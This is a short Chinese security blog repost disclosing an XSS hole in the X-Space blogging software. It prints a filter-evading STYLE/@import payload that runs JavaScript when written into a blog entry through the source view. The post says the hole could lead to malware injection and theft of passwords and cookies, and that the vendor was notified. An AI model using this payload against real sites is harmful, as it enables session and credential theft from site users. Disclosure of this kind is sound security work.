X-Space XSS 0Day 's

2017年5月7日14:50:52评论556 views字数 173阅读0分34秒阅读模式

摘要

作者：茄子宝
来源：茄子乱语直接用日志显示源代码方式编辑写入
XSS

<STYLE>@im/port'/ja/vasc/ript:alert("XSS")';</STYLE>

</STRONG></P>
此处脚本漏洞存在有一定的风险，可能导致挂马，威胁到用户，密码，COOKIE等敏感信息，已通知官方处理等待更新程序.

作者：茄子宝
来源：茄子乱语

直接用日志显示源代码方式编辑写入

XSS


<P><STRONG>
<STYLE>@im/port'/ja/vasc/ript:alert("XSS")';</STYLE>

</STRONG></P>
此处脚本漏洞存在有一定的风险，可能导致挂马，威胁到用户，密码，COOKIE等敏感信息，已通知官方处理等待更新程序.

本文由 admin 发表于 2017年5月7日14:50:52
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
X-Space XSS 0Day 'shttps://cn-sec.com/archives/49863.html

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit